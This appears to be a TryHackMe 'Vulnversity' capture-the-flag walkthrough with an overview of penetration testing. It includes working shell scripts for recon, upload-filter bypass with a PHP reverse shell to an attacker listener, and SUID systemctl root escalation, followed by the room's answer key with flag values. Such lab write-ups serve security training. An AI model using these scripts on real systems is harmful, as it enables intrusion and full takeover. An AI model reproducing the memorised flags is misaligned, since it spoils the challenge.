Introduction
This post is a walkthrough for the “Vulnversity” challenge on TryHackMe, designed to practice basic web exploitation and privilege escalation techniques in a controlled environment. It covers web-based vulnerability exploitation, a file upload filter bypass, and basic Linux privilege escalation, and follows the core penetration-testing methodology of reconnaissance, exploitation, and privilege escalation.
What is Penetration Testing
Penetration testing, or “pen testing,” is a security assessment process where cybersecurity professionals simulate real-world attacks on a computer system, network, or web application to identify vulnerabilities. The goal is to uncover and address security weaknesses before malicious hackers exploit them. Here’s an overview:
1. Purpose of Penetration Testing
- Identify Vulnerabilities: Pinpoint weaknesses in an organization’s infrastructure, applications, and configurations.
- Improve Security Posture: Offer insights for strengthening defenses and mitigating risks.
- Compliance and Assurance: Many industries require regular pen tests to meet security compliance standards (e.g., PCI-DSS for payment systems).
2. Types of Penetration Testing
- Network Penetration Testing: Targets network infrastructure, assessing firewall, router, and server security.
- Web Application Penetration Testing: Focuses on web apps, testing for vulnerabilities like SQL injection, XSS (Cross-Site Scripting), and authentication weaknesses.
- Social Engineering: Tests human factors by attempting to manipulate employees into revealing sensitive information.
- Wireless Penetration Testing: Assesses the security of Wi-Fi networks, ensuring strong encryption and configuration.
- Physical Penetration Testing: Evaluates physical security, such as entry points, ID checks, and access control mechanisms.
3. Stages of Penetration Testing
- Planning and Reconnaissance: Define the scope and gather information (e.g., IP addresses, software details).
- Scanning: Identify entry points by examining the target’s response to various inputs.
- Gaining Access: Attempt to exploit vulnerabilities to gain unauthorized access.
- Maintaining Access: Determine whether a foothold can be kept and extended (persistence, privilege escalation, lateral movement), mimicking an attacker who wants to stay in the environment.
- Analysis and Reporting: Document findings, analyze results, and provide recommendations.
4. Penetration Testing Tools
- Nmap: A tool for network discovery and security auditing.
- Metasploit: A framework for developing and executing exploit code.
- Burp Suite: A toolkit for web application security testing.
- Wireshark: A network protocol analyzer for capturing and inspecting data packets.
- OWASP ZAP: An open-source tool for finding vulnerabilities in web applications.
5. Importance of Penetration Testing
- Proactive Security: Finds and fixes vulnerabilities proactively, reducing the risk of cyberattacks.
- Protects Sensitive Data: Ensures that sensitive data remains secure by identifying risks before they can be exploited.
- Continuous Improvement: Regular testing helps maintain a robust security posture as technologies and threats evolve.
6. Challenges in Penetration Testing
- Scope Creep: Expanding beyond the initially defined scope, which can make results unfocused.
- False Positives: Incorrectly identifying vulnerabilities that aren’t truly exploitable.
- Resource-Intensive: Requires time, skilled personnel, and specialized tools, which can be costly for organizations.
Penetration Testing Methodology
Initial Nmap Scan:
- An Nmap scan with version detection is used to identify open ports and services. Six ports are open: FTP (21), SSH (22), Samba (139, 445), Squid proxy (3128), and an Apache HTTP server on port 3333.
- The version information the scan returns (Squid 3.5.12, an Ubuntu build of Apache) is what narrows down potential vulnerabilities and the likely operating system.
Directory Enumeration:
- Using Gobuster, directories on the web server are enumerated. The /internal directory is identified; it contains an upload page, a potential entry point for uploading a reverse shell.
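The recon steps above (the Nmap scan and the Gobuster run) as an added example, not code from the original post. The target address and the wordlist path are assumptions; the sample Nmap output at the bottom is constructed so the parser can be exercised offline, and it lists only what the walkthrough reports (six open ports, Squid 3.5.12, Apache on 3333).

```shell
#!/bin/sh
# Recon helpers: nmap with version detection, a parser for nmap's grepable (-oG)
# output, and the Gobuster directory brute-force. Added example, not the room's code.

TARGET="${TARGET:-10.10.10.10}"                                   # assumed lab IP
WORDLIST="${WORDLIST:-/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt}"  # assumed path

# Full TCP range with service/version detection, saved in grepable form.
# -p- covers all 65535 ports: a default top-1000 scan can miss services on high ports
# (3333 happens to be in the top 1000, but do not rely on that). -p-400 would scan 1..400.
nmap_scan() {
  nmap -sV -p- -T4 -oG "$2" "$1"
}

# One "port proto service version" line per open port found in a -oG file.
# -oG packs every port into a tab-separated "Ports:" field whose entries look like
#   3128/open/tcp//squid-http//Squid http proxy 3.5.12/
# i.e. port/state/proto/owner/service/rpcinfo/version, comma-separated.
parse_open_ports() {
  grep 'Ports:' "$1" \
    | sed 's/.*Ports: //; s/[[:space:]]Ignored State:.*//' \
    | tr ',' '\n' \
    | sed 's/^ *//' \
    | awk -F/ '$2 == "open" { printf "%s %s %s %s\n", $1, $3, $5, $7 }'
}

# Number of open ports (the room's "how many ports are open?" question).
count_open_ports() {
  parse_open_ports "$1" | wc -l | tr -d ' '
}

# Directory brute-force of the web root on port 3333, as the walkthrough does with Gobuster.
enum_dirs() {
  gobuster dir -u "http://$1:3333" -w "$WORDLIST"
}

# Constructed sample of what nmap -oG writes for this box (not real scan output).
write_sample_gnmap() {
  printf 'Host: %s ()\tStatus: Up\n' "$TARGET" > "$1"
  printf 'Host: %s ()\tPorts: 21/open/tcp//ftp//vsftpd/, 22/open/tcp//ssh//OpenSSH/, 139/open/tcp//netbios-ssn//Samba smbd/, 445/open/tcp//netbios-ssn//Samba smbd/, 3128/open/tcp//squid-http//Squid http proxy 3.5.12/, 3333/open/tcp//http//Apache httpd/\tIgnored State: closed (65529)\n' "$TARGET" >> "$1"
}

# Typical use against the live box:
#   nmap_scan "$TARGET" scan.gnmap && parse_open_ports scan.gnmap && enum_dirs "$TARGET"
```

Parsing the grepable output rather than eyeballing the normal output is what keeps port counts and version strings exact when you answer the room's questions or write a report; the same parser works on any `-oG` file.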
Reverse Shell Upload and Execution:
- The upload page filters certain file types (.php is blocked), so the reverse shell is renamed with a .phtml extension to bypass the restriction. The bypass works because the filter is an extension blocklist while Apache's PHP handler on Ubuntu also matches .phtml, so the file is still executed as PHP.
- Once uploaded successfully, the shell is executed by requesting it under the /internal/uploads/ path, establishing a connection back to the attacker's listener.
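The extension fuzzing and shell preparation described above, as an added example rather than the room's own material. Assumptions that are not from the page: the reverse shell is pentestmonkey's php-reverse-shell.php (only its `$ip` and `$port` lines are edited), the form's file field is named `file`, the listener address is 10.8.0.1:4444, and the server answers a blocked upload with the text in `REJECT_MSG`. The stub PHP file at the bottom is constructed so the preparation step can be checked offline.

```shell
#!/bin/sh
# Upload-bypass helpers. Added example; see the lead-in for what is assumed.
TARGET="${TARGET:-10.10.10.10}"      # assumed lab IP
LHOST="${LHOST:-10.8.0.1}"           # assumed attacker (tun0) address
LPORT="${LPORT:-4444}"
REJECT_MSG="${REJECT_MSG:-Extension not allowed}"   # assumed rejection text

# Copy the PHP reverse shell, point it at our listener and give it the requested
# extension. Apache on Ubuntu hands .phtml (and .phar) to the PHP handler just like
# .php, so a blocklist that only names .php is skin deep.
# $1 = source shell, $2 = extension without the dot; prints the output file name.
prepare_shell() {
  src="$1"; ext="$2"; out="shell.$ext"
  sed -e "s/^[\$]ip = '[^']*';/\$ip = '$LHOST';/" \
      -e "s/^[\$]port = [0-9]*;/\$port = $LPORT;/" "$src" > "$out"
  printf '%s\n' "$out"
}

# Try each candidate extension against the upload form and report which ones are
# accepted: the same thing the room does with Burp Intruder, done with curl.
fuzz_extensions() {
  for ext in php php3 php4 php5 phtml; do
    f=$(prepare_shell "$1" "$ext")
    body=$(curl -s -F "file=@$f" "http://$TARGET:3333/internal/")   # field name assumed
    if printf '%s' "$body" | grep -q "$REJECT_MSG"; then
      printf '.%-6s blocked\n' "$ext"
    else
      printf '.%-6s accepted\n' "$ext"
    fi
  done
}

# Request the uploaded file so the server executes it. Start the listener first,
# in another terminal:  nc -lvnp "$LPORT"
trigger_shell() {
  curl -s "http://$TARGET:3333/internal/uploads/$1" >/dev/null &
}

# Constructed stand-in for the two lines of php-reverse-shell.php that must be edited;
# the real file has the same two assignments near its top.
write_stub_shell() {
  printf "<?php\n\$ip = '127.0.0.1';  // CHANGE THIS\n\$port = 1234;       // CHANGE THIS\n" > "$1"
}

# Typical use against the live box (shell.phtml is the one the filter lets through):
#   fuzz_extensions php-reverse-shell.php; trigger_shell shell.phtml
```

The point of `fuzz_extensions` is that the filter decides by extension while the web server decides by its handler configuration; any extension on the accepted list that the PHP handler also matches gives code execution, which is why .phtml works here.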
Privilege Escalation:
- After landing on the server as the low-privileged web user (bill), enumerating SUID binaries identifies /bin/systemctl with the setuid bit set, which stands out because systemctl is not normally SUID.
- Systemctl Exploit: a service unit is written whose ExecStart runs a command of the attacker's choosing; because the SUID systemctl loads and starts that unit as root, the command runs as root, which is used to escalate privileges.
Retrieving Flags:
- The root flag is located in the root user’s directory after privilege escalation, marking the final step of the challenge.
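The SUID enumeration, the malicious unit and the flag retrieval above, as one added example (not the room's material). The technique is the one GTFOBins documents for a SUID systemctl; the unit name, the command it runs and the /tmp paths are illustrative choices.

```shell
#!/bin/sh
# SUID systemctl privilege escalation. Added example; paths and unit name are assumptions.

# Step 1: the enumeration that surfaces /bin/systemctl (-u=s: setuid bit set).
find_suid() {
  find / -perm -u=s -type f 2>/dev/null
}

# Step 2: write a oneshot unit whose ExecStart is the command we want run as root.
# $1 = path of the unit file (must end in .service), $2 = the command.
make_unit() {
  cat > "$1" <<EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "$2"
[Install]
WantedBy=multi-user.target
EOF
  printf '%s\n' "$1"
}

# Step 3: register and start the unit with the SUID binary. 'link' makes systemd
# aware of a unit outside its search path; 'enable --now' starts it immediately.
# Because systemctl runs setuid root, ExecStart is executed as root.
run_as_root() {
  /bin/systemctl link "$1"
  /bin/systemctl enable --now "$1"
}

# Putting it together: copy the root flag somewhere the web user can read it.
grab_root_flag() {
  unit="$(mktemp).service"   # unique name; systemd insists on the .service suffix
  make_unit "$unit" "cat /root/root.txt > /tmp/root.txt; chmod 644 /tmp/root.txt" >/dev/null
  run_as_root "$unit"
  cat /tmp/root.txt
}

# A full root shell instead of a single file: use the command
#   chmod u+s /bin/bash
# in ExecStart, then run  /bin/bash -p  to keep the effective uid.
```

Reading the flag this way is enough for the room, but the `chmod u+s /bin/bash` variant in the closing comment is what you would use when you need an interactive root shell for further work.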
Room Answers | TryHackMe Vulnversity Walkthrough
There are many Nmap “cheatsheets” online that you can use too.
No answer needed
Scan the box; how many ports are open?
6
What version of the squid proxy is running on the machine?
3.5.12
How many ports will Nmap scan if the flag -p-400 was used?
400
What is the most likely operating system this machine is running?
Ubuntu
What port is the web server running on?
3333
It’s essential to do your reconnaissance thoroughly before progressing. Knowing every open service (each can be a point of exploitation) is very important; don’t forget that ports in a higher range might be open, so always scan ports above 1000 as well (even if you leave that check running in the background).
No answer needed
What is the flag for enabling verbose mode using Nmap?
-v
I have successfully configured Gobuster.
No answer needed
What is the directory that has an upload form page?
/internal/
What common file type, one you’d want to upload to exploit the server, is blocked? Try a couple to find out.
.php
I understand the Burpsuite tool and its purpose during pentesting.
No answer needed
What extension is allowed after running the above exercise?
.phtml
While completing the above exercise, I have successfully downloaded the PHP reverse shell.
No answer needed
What is the name of the user who manages the webserver?
bill
What is the user flag?
8bd7992fbe8a6ad22a63361004cfcedb
On the system, search for all SUID files. Which file stands out?
/bin/systemctl
What is the root flag value?
a58ff8579f0a9270368d33a9966c7fd5